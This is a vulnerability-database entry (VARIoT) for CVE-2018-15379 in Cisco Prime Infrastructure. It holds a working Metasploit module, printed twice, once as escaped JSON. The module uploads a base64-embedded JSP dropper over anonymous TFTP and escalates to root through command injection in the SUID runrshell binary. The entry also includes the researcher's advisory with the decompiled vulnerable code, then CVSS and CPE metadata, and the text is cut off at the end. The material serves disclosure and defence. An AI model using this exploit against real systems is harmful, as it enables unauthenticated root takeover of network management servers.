var-201810-0571
Vulnerability from variot
A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication. Cisco Prime Infrastructure is prone to an arbitrary file-upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution with root privileges within the context of the vulnerable application. This issue is being tracked by Cisco Bug ID CSCvk24890.
This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions
might also be affected, although 3.4.0.0.348 is the latest at the time of writing.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-15379' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2018/Oct/19'],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt' ],
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/3723' ],
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp' ]
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
[ 'Cisco Prime Infrastructure < 3.4.1 & 3.3.1 Update 02', {} ]
],
'Privileged' => true,
'DefaultOptions' => { 'WfsDelay' => 10 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 04 2018'
))
register_options(
[
OptPort.new('RPORT', [true, 'The target port', 443]),
OptPort.new('RPORT_TFTP', [true, 'TFTPD port', 69]),
OptBool.new('SSL', [true, 'Use SSL connection', true]),
OptString.new('TARGETURI', [ true, "swimtemp path", '/swimtemp'])
])
end
def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'swimtemp'), 'method' => 'GET' })
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 404 && res.body.length == 0
# at the moment this is the best way to detect
# a 404 in swimtemp only returns the error code with a body length of 0,
# while a 404 to another webapp or to the root returns code plus a body with content
return CheckCode::Detected
end
CheckCode::Safe
end
def upload_payload(payload) lport = datastore['LPORT'] || (1025 + rand(0xffff-1025)) lhost = datastore['LHOST'] || "0.0.0.0" remote_file = rand_text_alpha(5..16) + '.jsp'
tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => lhost,
"LocalPort" => lport,
"PeerHost" => rhost,
"PeerPort" => datastore['RPORT_TFTP'],
"LocalFile" => "DATA:#{payload}",
"RemoteFile" => remote_file,
"Mode" => 'octet',
"Context" => {'Msf' => self.framework, 'MsfExploit' => self},
"Action" => :upload
)
print_status "Uploading TFTP payload to #{rhost}:#{datastore['TFTP_PORT']} as '#{remote_file}'"
tftp_client.send_write_request
remote_file
end
def generate_jsp_payload exe = generate_payload_exe base64_exe = Rex::Text.encode_base64(exe)
native_payload_name = rand_text_alpha(3..9)
var_raw = rand_text_alpha(3..11)
var_ostream = rand_text_alpha(3..11)
var_pstream = rand_text_alpha(3..11)
var_buf = rand_text_alpha(3..11)
var_decoder = rand_text_alpha(3..11)
var_tmp = rand_text_alpha(3..11)
var_path = rand_text_alpha(3..11)
var_tmp2 = rand_text_alpha(3..11)
var_path2 = rand_text_alpha(3..11)
var_proc2 = rand_text_alpha(3..11)
var_proc1 = rand_text_alpha(3..11)
chmod = %Q|
Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path} + " " + #{var_path2});
Thread.sleep(200);
|
var_proc3 = Rex::Text.rand_text_alpha(3..11)
cleanup = %Q|
Thread.sleep(200);
Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path} + " " + #{var_path2});
|
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
String #{var_buf} = "#{base64_exe}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".bin");
String #{var_path} = #{var_tmp}.getAbsolutePath();
BufferedOutputStream #{var_ostream} =
new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
File #{var_tmp2} = File.createTempFile("#{native_payload_name}", ".sh");
String #{var_path2} = #{var_tmp2}.getAbsolutePath();
PrintWriter #{var_pstream} =
new PrintWriter(new FileOutputStream(#{var_path2}));
#{var_pstream}.println("!#/bin/sh");
#{var_pstream}.println("/opt/CSCOlumos/bin/runrshell '\\" && " + #{var_path} + " #'");
#{var_pstream}.close();
#{chmod}
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2});
#{cleanup}
} catch (Exception e) {
}
%>
|
jsp = jsp.gsub(/\n/, '')
jsp = jsp.gsub(/\t/, '')
jsp = jsp.gsub(/\x0d\x0a/, "")
jsp = jsp.gsub(/\x0a/, "")
return jsp
end
def exploit jsp_payload = generate_jsp_payload
jsp_name = upload_payload(jsp_payload)
# we land in /opt/CSCOlumos, so we don't know the apache directory
# as it changes between versions... so leave this commented for now
# ... and try to find a good way to clean it later
print_warning "#{jsp_name} must be manually removed from the Apache in /opt/CSCOlumos"
# register_files_for_cleanup(jsp_name)
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], jsp_name),
'method' => 'GET'
})
handler
end end . >> Unauthenticated remote code execution and privilege escalation in Cisco Prime Infrastructure
> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
Disclosure: 4/10/2018 / Last updated: 8/10/2018
Introduction: From the vendor's website ([1]): "Cisco Prime Infrastructure simplifies the management of wireless and wired networks. This single, unified solution provides wired and wireless lifecycle management, and application visibility and control. It also offers policy monitoring and troubleshooting with the Cisco Identity Services Engine (ISE) and location-based tracking of mobility devices with the Cisco Mobility Services Engine (MSE). You can manage the network, devices, applications, and users a all from one place. Cisco Prime Infrastructure offers support for 802.11ac, correlated wired-wireless client visibility, spatial maps, Radio Frequency prediction tools, and much more. Simplify the management of the wireless infrastructure while solving problems faster and with fewer resources. Cisco Prime Infrastructure offers new, guided workflows for the Intelligent WAN and Converged Access, based on Cisco best practices. These workflows make new branch rollouts easy and fast, from setting up devices and services to automatically managing and monitoring them. Cisco Prime Infrastructure offers fault, configuration, accounting, performance, and security (FCAPS) management with 360-degree views of Cisco Unified Computing System Series B Blade Servers and Series C Rack Servers and Cisco Nexus switches, including the Application-Centric Infrastructureaready Cisco Nexus 9000 Series Switches. Your data center is critical to service assurance. Device Packs offer ongoing support of new Cisco devices and software releases. It provides parity within each device family, eliminating gaps in management operations, especially when it comes to service availability and troubleshooting. Technology Packs deliver new features between releases, accelerating time to value for high-demand functionality. Large or global organizations often distribute network management by domain, region, or country. Cisco Prime Infrastructure Operations Center lets you visualize up to 10 Cisco Prime Infrastructure instances, scaling your management infrastructure while maintaining central visibility and control."
Background and summary: Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow an unauthenticated attacker to achieve remote code execution.
A Metasploit module has been released with this advisory, and can be found at [2] and [3]. This module exploits the two vulnerabilities described in this advisory to achieve unauthenticated remote code execution as root on the CPI default installation. It should be integrated into Metasploit's repository in the coming weeks.
A special thanks to Beyond Security and their SecuriTeam Secure Disclosure (SSD) programme, which have helped me disclose this vulnerability to the vendor. Their version of this advisory can be found in [2].
Technical details:
1
Vulnerability: Arbitrary file upload and execution via tftp and Apache Tomcat CVE-2018-15379 Attack Vector: Remote Constraints: None Affected products / versions: - Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected
Most web applications running on the CPI virtual appliance are deployed under /opt/CSCOlumos/apache-tomcat-
ade # ls -l /opt/CSCOlumos/apache-tomcat-8.5.14/webapps/ total 16 drwxrwxr-x. 3 root gadmin 4096 Mar 29 19:49 ROOT drwxrwxr-x. 8 root gadmin 4096 Mar 29 21:44 SSO lrwxrwxrwx. 1 root gadmin 36 Mar 29 21:32 SSO.war -> /opt/CSCOlumos/wars/SSO-13.0.201.war drwxrwxr-x. 4 root gadmin 4096 Mar 29 21:45 ifm_poap_rest lrwxrwxrwx. 1 root gadmin 45 Mar 29 21:32 ifm_poap_rest.war -> /opt/CSCOlumos/wars/ifm_poap_rest-3.70.21.war lrwxrwxrwx. 1 root gadmin 16 Mar 29 19:49 swimtemp -> /localdisk/tftp/ drwxrwxr-x. 22 root gadmin 4096 May 2 15:20 webacs lrwxrwxrwx. 1 root gadmin 30 Mar 29 21:32 webacs.war -> /opt/CSCOlumos/wars/webacs.war
As the name implies, this is the directory used by tftp to store files. Cisco has also enabled the upload of files to this directory as tftpd is started with the -c (file create) flag, and it accepts anonymous connections: /usr/sbin/in.tftpd --ipv4 -vv -c --listen -u prime -a :69 --retransmit 6000000 -s /localdisk/tftp
The tftpd port is also open to the world in the virtual appliance firewall, so it is trivial to upload a JSP web shell file using a tftp client to the /localdisk/tftp/ directory.
The web shell will then be available at https://
2
Vulnerability: runrshell Command Injection (no specific CVE was attributed to this vulnerability by Cisco; use CVE-2018-15379, same as vulnerability #1) Attack Vector: Local Constraints: None Affected products / versions: - Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected
The CPI virtual appliance contains a binary at /opt/CSCOlumos/bin/runrshell, which has the SUID bit set and executes as root. It is supposed to start a restricted shell that can only execute commands in /opt/CSCOlumos/rcmds. The decompilation of this function is shown below:
int main(int argc, char argv, char envp) { char dest; int i;
setuid(0); setgid(0); setenv("PATH", "/opt/CSCOlumos/rcmds", 1); memcpy(&dest, "/bin/bash -r -c \"", 0x12uLL); for ( i = 1; argc - 1 >= i; ++i ) { strcat(&dest, argv[i]); strcat(&dest, " "); } strcat(&dest, "\""); return (system(&dest) & 0xFF00) >> 8; }
As it can be seen above, the binary uses the system() function to execute:
/bin/bash -r -c "
... with the PATH set to /opt/CSCOlumos/rcmds, and the restricted (-r) flag passed to bash, meaning that only commands in the PATH can be executed, environment variables cannot be changed or set, directory cannot be changed, etc.
However, due to the way system() function calls "bash -c", it is trivial to inject a command by forcing an end quote after
root
Fix: Vulnerability #1 has ben fixed fixed with the patch provided by Cisco in [4]. Vulnerability #2 does not appear to have been fixed as of the last update of this advisory.
Please note that Agile Information Security does not verify any fixes, except when noted in the advisory or requested by the vendor. The vendor fixes might be ineffective or incomplete, and it is the vendor's responsibility to ensure the vulnerablities found by Agile Information Security are resolved properly.
References: [1] https://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html [2] https://blogs.securiteam.com/index.php/archives/3723 [3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_prime_inf_rce.rb [4] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp
================ Agile Information Security Limited http://www.agileinfosec.co.uk/
Show details on source websiteEnabling secure digital business >>
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-0571",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prime infrastructure",
"scope": "eq",
"trust": 1.9,
"vendor": "cisco",
"version": "3.4"
},
{
"model": "prime infrastructure",
"scope": "eq",
"trust": 1.9,
"vendor": "cisco",
"version": "3.3"
},
{
"model": "prime infrastructure",
"scope": "eq",
"trust": 1.9,
"vendor": "cisco",
"version": "3.2"
},
{
"model": "prime infrastructure",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "3.2\\(1.0\\)"
},
{
"model": "prime infrastructure",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "3.4\\(0.0\\)"
},
{
"model": "prime infrastructure",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "3.3\\(0.0\\)"
},
{
"model": "prime infrastructure",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "3.2\\(2.0\\)"
},
{
"model": "prime infrastructure",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "3.5\\(0.0\\)"
},
{
"model": "prime infrastructure",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "3.2\\(0.0\\)"
},
{
"model": "prime infrastructure",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "prime infrastructure 3.2-fips",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "prime infrastructure",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "3.4.1"
},
{
"model": "prime infrastructure update",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "3.3.102"
}
],
"sources": [
{
"db": "BID",
"id": "105506"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013332"
},
{
"db": "NVD",
"id": "CVE-2018-15379"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-179"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.4\\(0.0\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.5\\(0.0\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2\\(0.0\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2\\(2.0\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2:fips:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2\\(1.0\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.3\\(0.0\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-15379"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pedro Ribeiro",
"sources": [
{
"db": "BID",
"id": "105506"
},
{
"db": "PACKETSTORM",
"id": "150287"
},
{
"db": "PACKETSTORM",
"id": "149714"
},
{
"db": "PACKETSTORM",
"id": "149727"
}
],
"trust": 0.6
},
"cve": "CVE-2018-15379",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-15379",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-125632",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-15379",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-15379",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-179",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-125632",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-125632"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013332"
},
{
"db": "NVD",
"id": "CVE-2018-15379"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-179"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication. Cisco Prime Infrastructure is prone to an arbitrary file-upload vulnerability. \nAn attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution with root privileges within the context of the vulnerable application. \nThis issue is being tracked by Cisco Bug ID CSCvk24890. \n\n This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions\n might also be affected, although 3.4.0.0.348 is the latest at the time of writing. \n },\n \u0027Author\u0027 =\u003e\n [\n \u0027Pedro Ribeiro \u003cpedrib[at]gmail.com\u003e\u0027 # Vulnerability discovery and Metasploit module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e\n [\n [ \u0027CVE\u0027, \u00272018-15379\u0027 ],\n [ \u0027URL\u0027, \u0027https://seclists.org/fulldisclosure/2018/Oct/19\u0027],\n [ \u0027URL\u0027, \u0027https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt\u0027 ],\n [ \u0027URL\u0027, \u0027https://blogs.securiteam.com/index.php/archives/3723\u0027 ],\n [ \u0027URL\u0027, \u0027https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp\u0027 ]\n ],\n \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n \u0027Arch\u0027 =\u003e [ARCH_X86, ARCH_X64],\n \u0027Targets\u0027 =\u003e\n [\n [ \u0027Cisco Prime Infrastructure \u003c 3.4.1 \u0026 3.3.1 Update 02\u0027, {} ]\n ],\n \u0027Privileged\u0027 =\u003e true,\n \u0027DefaultOptions\u0027 =\u003e { \u0027WfsDelay\u0027 =\u003e 10 },\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DisclosureDate\u0027 =\u003e \u0027Oct 04 2018\u0027\n ))\n\n register_options(\n [\n OptPort.new(\u0027RPORT\u0027, [true, \u0027The target port\u0027, 443]),\n OptPort.new(\u0027RPORT_TFTP\u0027, [true, \u0027TFTPD port\u0027, 69]),\n OptBool.new(\u0027SSL\u0027, [true, \u0027Use SSL connection\u0027, true]),\n OptString.new(\u0027TARGETURI\u0027, [ true, \"swimtemp path\", \u0027/swimtemp\u0027])\n ])\n end\n\n\n def check\n res = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(datastore[\u0027TARGETURI\u0027], \u0027swimtemp\u0027),\n \u0027method\u0027 =\u003e \u0027GET\u0027\n })\n\n unless res\n vprint_error \u0027Connection failed\u0027\n return CheckCode::Unknown\n end\n\n if res.code == 404 \u0026\u0026 res.body.length == 0\n # at the moment this is the best way to detect\n # a 404 in swimtemp only returns the error code with a body length of 0,\n # while a 404 to another webapp or to the root returns code plus a body with content\n return CheckCode::Detected\n end\n\n CheckCode::Safe\n end\n\n\n def upload_payload(payload)\n lport = datastore[\u0027LPORT\u0027] || (1025 + rand(0xffff-1025))\n lhost = datastore[\u0027LHOST\u0027] || \"0.0.0.0\"\n remote_file = rand_text_alpha(5..16) + \u0027.jsp\u0027\n\n tftp_client = Rex::Proto::TFTP::Client.new(\n \"LocalHost\" =\u003e lhost,\n \"LocalPort\" =\u003e lport,\n \"PeerHost\" =\u003e rhost,\n \"PeerPort\" =\u003e datastore[\u0027RPORT_TFTP\u0027],\n \"LocalFile\" =\u003e \"DATA:#{payload}\",\n \"RemoteFile\" =\u003e remote_file,\n \"Mode\" =\u003e \u0027octet\u0027,\n \"Context\" =\u003e {\u0027Msf\u0027 =\u003e self.framework, \u0027MsfExploit\u0027 =\u003e self},\n \"Action\" =\u003e :upload\n )\n print_status \"Uploading TFTP payload to #{rhost}:#{datastore[\u0027TFTP_PORT\u0027]} as \u0027#{remote_file}\u0027\"\n tftp_client.send_write_request\n\n remote_file\n end\n\n def generate_jsp_payload\n exe = generate_payload_exe\n base64_exe = Rex::Text.encode_base64(exe)\n\n native_payload_name = rand_text_alpha(3..9)\n\n var_raw = rand_text_alpha(3..11)\n var_ostream = rand_text_alpha(3..11)\n var_pstream = rand_text_alpha(3..11)\n var_buf = rand_text_alpha(3..11)\n var_decoder = rand_text_alpha(3..11)\n var_tmp = rand_text_alpha(3..11)\n var_path = rand_text_alpha(3..11)\n var_tmp2 = rand_text_alpha(3..11)\n var_path2 = rand_text_alpha(3..11)\n var_proc2 = rand_text_alpha(3..11)\n\n var_proc1 = rand_text_alpha(3..11)\n chmod = %Q|\n Process #{var_proc1} = Runtime.getRuntime().exec(\"chmod 777 \" + #{var_path} + \" \" + #{var_path2});\n Thread.sleep(200);\n |\n\n var_proc3 = Rex::Text.rand_text_alpha(3..11)\n cleanup = %Q|\n Thread.sleep(200);\n Process #{var_proc3} = Runtime.getRuntime().exec(\"rm \" + #{var_path} + \" \" + #{var_path2});\n |\n\n jsp = %Q|\n \u003c%@page import=\"java.io.*\"%\u003e\n \u003c%@page import=\"sun.misc.BASE64Decoder\"%\u003e\n \u003c%\n try {\n String #{var_buf} = \"#{base64_exe}\";\n BASE64Decoder #{var_decoder} = new BASE64Decoder();\n byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());\n\n File #{var_tmp} = File.createTempFile(\"#{native_payload_name}\", \".bin\");\n String #{var_path} = #{var_tmp}.getAbsolutePath();\n\n BufferedOutputStream #{var_ostream} =\n new BufferedOutputStream(new FileOutputStream(#{var_path}));\n #{var_ostream}.write(#{var_raw});\n #{var_ostream}.close();\n\n File #{var_tmp2} = File.createTempFile(\"#{native_payload_name}\", \".sh\");\n String #{var_path2} = #{var_tmp2}.getAbsolutePath();\n\n PrintWriter #{var_pstream} =\n new PrintWriter(new FileOutputStream(#{var_path2}));\n #{var_pstream}.println(\"!#/bin/sh\");\n #{var_pstream}.println(\"/opt/CSCOlumos/bin/runrshell \u0027\\\\\" \u0026\u0026 \" + #{var_path} + \" #\u0027\");\n #{var_pstream}.close();\n #{chmod}\n\n Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2});\n #{cleanup}\n } catch (Exception e) {\n }\n %\u003e\n |\n\n jsp = jsp.gsub(/\\n/, \u0027\u0027)\n jsp = jsp.gsub(/\\t/, \u0027\u0027)\n jsp = jsp.gsub(/\\x0d\\x0a/, \"\")\n jsp = jsp.gsub(/\\x0a/, \"\")\n\n return jsp\n end\n\n\n def exploit\n jsp_payload = generate_jsp_payload\n\n jsp_name = upload_payload(jsp_payload)\n\n # we land in /opt/CSCOlumos, so we don\u0027t know the apache directory\n # as it changes between versions... so leave this commented for now\n # ... and try to find a good way to clean it later\n print_warning \"#{jsp_name} must be manually removed from the Apache in /opt/CSCOlumos\"\n # register_files_for_cleanup(jsp_name)\n\n print_status(\"#{peer} - Executing payload...\")\n send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(datastore[\u0027TARGETURI\u0027], jsp_name),\n \u0027method\u0027 =\u003e \u0027GET\u0027\n })\n\n handler\n end\nend\n. \u003e\u003e Unauthenticated remote code execution and privilege escalation in Cisco Prime Infrastructure\n\u003e\u003e Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)\n==========================================================================\nDisclosure: 4/10/2018 / Last updated: 8/10/2018\n\n\n\u003e\u003e Introduction:\nFrom the vendor\u0027s website ([1]):\n\"Cisco Prime Infrastructure simplifies the management of wireless and wired networks. This single, unified solution provides wired and wireless lifecycle management, and application visibility and control. It also offers policy monitoring and troubleshooting with the Cisco Identity Services Engine (ISE) and location-based tracking of mobility devices with the Cisco Mobility Services Engine (MSE). You can manage the network, devices, applications, and users a all from one place. \nCisco Prime Infrastructure offers support for 802.11ac, correlated wired-wireless client visibility, spatial maps, Radio Frequency prediction tools, and much more. Simplify the management of the wireless infrastructure while solving problems faster and with fewer resources. \nCisco Prime Infrastructure offers new, guided workflows for the Intelligent WAN and Converged Access, based on Cisco best practices. These workflows make new branch rollouts easy and fast, from setting up devices and services to automatically managing and monitoring them. \nCisco Prime Infrastructure offers fault, configuration, accounting, performance, and security (FCAPS) management with 360-degree views of Cisco Unified Computing System Series B Blade Servers and 